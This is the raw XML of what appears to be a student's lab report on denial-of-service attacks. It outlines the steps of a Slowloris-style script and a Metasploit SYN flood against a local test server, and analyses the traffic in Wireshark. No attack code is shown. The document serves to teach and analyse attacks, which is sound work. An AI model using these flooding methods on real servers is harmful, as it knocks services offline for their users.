      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve"> DOS is when </w:t>
      </w:r>
      <w:r w:rsidRPr="00CB1DFB">
        <w:rPr>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">In place of flooding the server </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">with </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>request ,</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve"> attacker overwhelm with too many simultaneous open HTTP connection .To keep these connection active just to avoid timeout sent partial request header to target just to keep alive. As server will </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>not</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve"> able to respond to additional request made from regular traffic thus DOS.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12E1E76B" w14:textId="4B3F466B" w:rsidR="001C30D1" w:rsidRDefault="001C30D1" w:rsidP="002548C7">
      <w:r>
        <w:t>[1]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F3BB1E6" w14:textId="75E0238D" w:rsidR="001C30D1" w:rsidRDefault="001C30D1" w:rsidP="002548C7">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="32C0C9E4" wp14:editId="37BA60D6">
            <wp:extent cx="5943600" cy="368046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9"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5943600" cy="3680460"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="4381C04C" w14:textId="236ABBFA" w:rsidR="0095021E" w:rsidRDefault="0095021E" w:rsidP="002548C7">
      <w:r>
        <w:t xml:space="preserve">1.So we fake some </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>HTTP</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> GET header info with the target </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>ip</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> and port</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50BA30F9" w14:textId="1D6E6B76" w:rsidR="0095021E" w:rsidRDefault="0095021E" w:rsidP="002548C7">
      <w:r>
        <w:t>2.Then we create socket connection to send GET and HTTP request to target</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="301D555A" w14:textId="16FA667C" w:rsidR="0095021E" w:rsidRDefault="0095021E" w:rsidP="002548C7">
      <w:r>
        <w:t xml:space="preserve">3. We are handling error so that it </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>sleep</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> and try new socket</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F3A5EEB" w14:textId="21B17231" w:rsidR="0095021E" w:rsidRDefault="0095021E" w:rsidP="002548C7">
      <w:r>
        <w:t xml:space="preserve">4.In attack module/vector we are </w:t>
      </w:r>
      <w:r w:rsidR="003A55AA">
        <w:t xml:space="preserve">sending get request with X-a header field and thereby keep target </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidR="003A55AA">
        <w:t>waiting .The</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidR="003A55AA">
        <w:t xml:space="preserve"> frequency of get request is just under timeout so few second. If any socket </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidR="003A55AA">
        <w:t>lost</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidR="003A55AA">
        <w:t xml:space="preserve"> we create new one</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F767DF8" w14:textId="742B42B2" w:rsidR="003A55AA" w:rsidRDefault="003A55AA" w:rsidP="002548C7">
      <w:r>
        <w:t xml:space="preserve">5. For testing I have used </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>simpleserver</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> to load the target for socket connection</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51B89C2E" w14:textId="77777777" w:rsidR="0095021E" w:rsidRDefault="0095021E" w:rsidP="002548C7"/>
    <w:p w14:paraId="3C2CCC07" w14:textId="77777777" w:rsidR="0095021E" w:rsidRDefault="0095021E" w:rsidP="002548C7"/>
    <w:p w14:paraId="34F1FBFD" w14:textId="324C823A" w:rsidR="001C30D1" w:rsidRPr="0095021E" w:rsidRDefault="001C30D1" w:rsidP="002548C7">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0095021E">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Attack started</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2DE8A53B" w14:textId="08B4999A" w:rsidR="001C30D1" w:rsidRDefault="001C30D1" w:rsidP="002548C7">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="13756A83" wp14:editId="7CF2603D">
            <wp:extent cx="5943600" cy="710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10565"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="2FBBC1B1" w14:textId="557D611E" w:rsidR="001C30D1" w:rsidRDefault="001C30D1" w:rsidP="002548C7">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7433B1A5" wp14:editId="3624F8F7">
            <wp:extent cx="5943600" cy="6141720"/>
            <wp:effectExtent l="0" t="0" r="0"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1"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5943600" cy="6141720"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="4603AB77" w14:textId="15D5DFD5" w:rsidR="001C30D1" w:rsidRDefault="001C30D1" w:rsidP="002548C7"/>
    <w:p w14:paraId="48F89B8F" w14:textId="0474AB19" w:rsidR="001C30D1" w:rsidRDefault="001C30D1" w:rsidP="002548C7"/>
    <w:p w14:paraId="0AD49203" w14:textId="05CEC54A" w:rsidR="001C30D1" w:rsidRPr="004F5B6B" w:rsidRDefault="00442390" w:rsidP="002548C7">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004F5B6B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">4. using </w:t>
      </w:r>
      <w:r w:rsidR="00041D7D" w:rsidRPr="004F5B6B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Auxiliary</w:t>
      </w:r>
      <w:r w:rsidRPr="004F5B6B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> Metasploit </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68736566" w14:textId="2E05D8C4" w:rsidR="00041D7D" w:rsidRDefault="00041D7D" w:rsidP="002548C7"/>
    <w:p w14:paraId="3159A175" w14:textId="53EB59EF" w:rsidR="00041D7D" w:rsidRDefault="00041D7D" w:rsidP="002548C7">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4ACBD620" wp14:editId="2428283F">
            <wp:extent cx="5943600" cy="196977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2"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5943600" cy="1969770"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="06E6158C" w14:textId="1C918521" w:rsidR="002A734E" w:rsidRDefault="002A734E" w:rsidP="002548C7"/>
    <w:p w14:paraId="111B8BDA" w14:textId="25503582" w:rsidR="000C1908" w:rsidRDefault="000C1908" w:rsidP="002548C7">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="23D07DB2" wp14:editId="5D9B2E68">
            <wp:extent cx="5943600" cy="379857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943600" cy="3798570"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11217B05" w14:textId="7453A565" w:rsidR="000C1908" w:rsidRDefault="000C1908" w:rsidP="002548C7">
      <w:r>
        <w:t>We can check that 56% TCP syn traffic in few minutes. Which will lead to resource starvation.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47FCFDF1" w14:textId="4FA6CFE8" w:rsidR="009F0E04" w:rsidRDefault="009F0E04" w:rsidP="002548C7"/>
    <w:p w14:paraId="4D82CA73" w14:textId="5023710F" w:rsidR="009F0E04" w:rsidRDefault="008323C7" w:rsidP="002548C7">
      <w:r>
        <w:t xml:space="preserve">A few </w:t>
      </w:r>
      <w:r w:rsidR="009F0E04">
        <w:t xml:space="preserve">SYN-ACK packets detected after </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidR="009F0E04">
        <w:t>sometime ,</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidR="009F0E04">
        <w:t xml:space="preserve"> but target is not being able to complete any handshake due to too many SYN</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7AB5308D" w14:textId="379B8C28" w:rsidR="00F829AF" w:rsidRDefault="00F829AF" w:rsidP="002548C7">
      <w:r>
        <w:t xml:space="preserve">Used </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t xml:space="preserve">filter  </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>tcp.flag.syn</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve">==1 and </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>tcp.flag.ack</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">==1 </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03411C5F" w14:textId="2A1F1E61" w:rsidR="009F0E04" w:rsidRDefault="0055048A" w:rsidP="002548C7">
      <w:pPr>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>-</w:t>
      </w:r>
      <w:r w:rsidR="009F0E04">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="14C43CDA" wp14:editId="2B6F81AF">
            <wp:extent cx="5943600" cy="522732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4"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5943600" cy="5227320"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="06DD390C" w14:textId="6FE2319C" w:rsidR="0055048A" w:rsidRDefault="0055048A" w:rsidP="002548C7">
      <w:pPr>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="53962CF9" w14:textId="72464828" w:rsidR="0055048A" w:rsidRDefault="0055048A" w:rsidP="002548C7">
      <w:pPr>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t>Using protocol herarchy we can veify the kind of packet being flooded i.e totally tcp</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78A7F735" w14:textId="17A53E28" w:rsidR="0055048A" w:rsidRDefault="0055048A" w:rsidP="002548C7">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="394E3FBA" wp14:editId="3DAF7D56">
            <wp:extent cx="5943600" cy="266890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a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5943600" cy="2668905"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="2FF19FDD" w14:textId="44360689" w:rsidR="000C1908" w:rsidRDefault="000C1908" w:rsidP="002548C7"/>
    <w:p w14:paraId="67A57E86" w14:textId="52F3C2D4" w:rsidR="000015F0" w:rsidRDefault="000015F0" w:rsidP="002548C7"/>
    <w:p w14:paraId="6C862B49" w14:textId="1EE0DD61" w:rsidR="000015F0" w:rsidRDefault="000015F0" w:rsidP="002548C7">
      <w:r>
        <w:t>Use I/0 graph, we can see that the rate of packet is reached 4000 which was just near 1000 before the start of attack/SYN flooding</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02CEC78D" w14:textId="77777777" w:rsidR="000015F0" w:rsidRDefault="000015F0" w:rsidP="002548C7"/>
    <w:p w14:paraId="0D08ABBC" w14:textId="1C17528E" w:rsidR="000015F0" w:rsidRDefault="000015F0" w:rsidP="002548C7">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6A60C3EC" wp14:editId="67F2CA22">
            <wp:extent cx="5943600" cy="358521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6"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5943600" cy="3585210"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="45C6D758" w14:textId="4070F719" w:rsidR="000015F0" w:rsidRDefault="000015F0" w:rsidP="002548C7">
      <w:r>
        <w:t xml:space="preserve">Using Metasploit we perform various over service </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>vulnerability based</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> DOS too like on </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>smb</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> in windows </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30DBAED5" w14:textId="76CEF6B8" w:rsidR="000015F0" w:rsidRDefault="000015F0" w:rsidP="002548C7"/>
    <w:p w14:paraId="7CDBECC6" w14:textId="77777777" w:rsidR="000015F0" w:rsidRDefault="000015F0" w:rsidP="002548C7"/>
    <w:p w14:paraId="4088E47F" w14:textId="3399887D" w:rsidR="001C30D1" w:rsidRDefault="001C30D1" w:rsidP="002548C7">
      <w:r>
        <w:t>Reference</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2415EA5F" w14:textId="77CCF282" w:rsidR="000015F0" w:rsidRDefault="000015F0" w:rsidP="002548C7"/>
    <w:p w14:paraId="0C8067AE" w14:textId="77777777" w:rsidR="000015F0" w:rsidRDefault="000015F0" w:rsidP="002548C7"/>
    <w:p w14:paraId="701E86E9" w14:textId="0A527031" w:rsidR="001C30D1" w:rsidRDefault="001C30D1" w:rsidP="002548C7">
      <w:r>
        <w:t>[1]</w:t>
      </w:r>
      <w:r w:rsidRPr="001C30D1">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:hyperlink r:id="rId17" w:history="1">
        <w:r w:rsidR="0095021E" w:rsidRPr="006E5F57">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>https://github.com/joelbarmettlerUZH/DeadlyBooring_DOS</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="6C6373C2" w14:textId="2532FD90" w:rsidR="0095021E" w:rsidRDefault="0095021E" w:rsidP="002548C7">
      <w:r>
        <w:t>[2]</w:t>
      </w:r>
      <w:r w:rsidRPr="0095021E">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:hyperlink r:id="rId18" w:history="1">
        <w:r w:rsidRPr="006E5F57">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>https://sandilands.info/sgordon/ping-flooding-dos-attack-in-a-virtual-network</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="4C029D80" w14:textId="0017D9AD" w:rsidR="0095021E" w:rsidRDefault="0095021E" w:rsidP="002548C7">
      <w:r>
        <w:t>[3]</w:t>
      </w:r>
      <w:r w:rsidRPr="0095021E">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:hyperlink r:id="rId19" w:history="1">
        <w:r w:rsidRPr="006E5F57">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>file:///C:/Users/syeda/Downloads/Kali%20Linux%20Network%20Scanning%20Cookbook.pdf</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="19E0777E" w14:textId="38323D83" w:rsidR="0095021E" w:rsidRDefault="0095021E" w:rsidP="002548C7">
      <w:r>
        <w:t>[</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>4]DDOS</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>:</w:t>
      </w:r>
      <w:r w:rsidRPr="0095021E">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:hyperlink r:id="rId20" w:history="1">
        <w:r w:rsidRPr="006E5F57">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>https://www.youtube.com/watch?v=-8uTV1-JgW8</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="60A8E5F9" w14:textId="53127A18" w:rsidR="0095021E" w:rsidRPr="003A1FD3" w:rsidRDefault="0095021E" w:rsidP="002548C7">
      <w:r>
        <w:t>[5]</w:t>
      </w:r>
    </w:p>
    <w:sectPr w:rsidR="0095021E" w:rsidRPr="003A1F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E96"/>
    <w:rsid w:val="000015F0"/>
    <w:rsid w:val="00041D7D"/>
    <w:rsid w:val="000C1908"/>
    <w:rsid w:val="00110CA2"/>
    <w:rsid w:val="00184B76"/>
    <w:rsid w:val="001C30D1"/>
    <w:rsid w:val="001F4D9F"/>
    <w:rsid w:val="0022030B"/>
    <w:rsid w:val="00226E2A"/>
    <w:rsid w:val="002548C7"/>
    <w:rsid w:val="00273E2D"/>
    <w:rsid w:val="002A734E"/>
    <w:rsid w:val="002D65A0"/>
    <w:rsid w:val="00356E96"/>
    <w:rsid w:val="00383CF2"/>
    <w:rsid w:val="003929A7"/>
    <w:rsid w:val="003A1FD3"/>
    <w:rsid w:val="003A55AA"/>
    <w:rsid w:val="003C3E4C"/>
    <w:rsid w:val="003E6C82"/>
    <w:rsid w:val="00441900"/>
    <w:rsid w:val="00442390"/>
    <w:rsid w:val="00446344"/>
    <w:rsid w:val="00491742"/>
    <w:rsid w:val="004C189F"/>
    <w:rsid w:val="004C3F9C"/>
    <w:rsid w:val="004F0D57"/>
    <w:rsid w:val="004F5B6B"/>
    <w:rsid w:val="0055048A"/>
    <w:rsid w:val="005829CA"/>
    <w:rsid w:val="005B2B0E"/>
    <w:rsid w:val="005F1DE0"/>
    <w:rsid w:val="006740A4"/>
    <w:rsid w:val="006A0809"/>
    <w:rsid w:val="006D118F"/>
    <w:rsid w:val="00745725"/>
    <w:rsid w:val="008323C7"/>
    <w:rsid w:val="00840D24"/>
    <w:rsid w:val="00867EAA"/>
    <w:rsid w:val="00876488"/>
    <w:rsid w:val="00883696"/>
    <w:rsid w:val="00896021"/>
    <w:rsid w:val="009239E9"/>
    <w:rsid w:val="0095021E"/>
    <w:rsid w:val="009B62FB"/>
    <w:rsid w:val="009D1028"/>
    <w:rsid w:val="009F0E04"/>
    <w:rsid w:val="00BD7116"/>
    <w:rsid w:val="00CB1DFB"/>
    <w:rsid w:val="00D75BA8"/>
    <w:rsid w:val="00DF2398"/>
    <w:rsid w:val="00F46171"/>
    <w:rsid w:val="00F7789A"/>
    <w:rsid w:val="00F82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8ECD2"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{9B51BB99-A98B-4A00-B996-45024A56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021E"/>
    <w:rPr>
      <w:color w:val="0563C1" w:themeColor="hyperlink"/>
      <w:u w:val="single"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="UnresolvedMention">
    <w:name w:val="Unresolved Mention"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00950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sandilands.info/sgordon/ping-flooding-dos-attack-in-a-virtual-network"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github.com/joelbarmettlerUZH/DeadlyBooring_DOS"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youtube.com/watch?v=-8uTV1-JgW8"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hyperlink" Target="file:///C:/Users/syeda/Downloads/Kali%20Linux%20Network%20Scanning%20Cookbook.pdf"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10</Pages>
  <Words>574</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aamir</dc:creator>
  <cp:keywords/>
  <dc:description/>
  <cp:lastModifiedBy>syed aamir</cp:lastModifiedBy>
  <cp:revision>43</cp:revision>
  <cp:lastPrinted>2022-04-30T17:39:00Z</cp:lastPrinted>
  <dcterms:created xsi:type="dcterms:W3CDTF">2022-04-30T13:03:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2022-05-07T21:43:00Z</dcterms:modified>
</cp:coreProperties>
</file>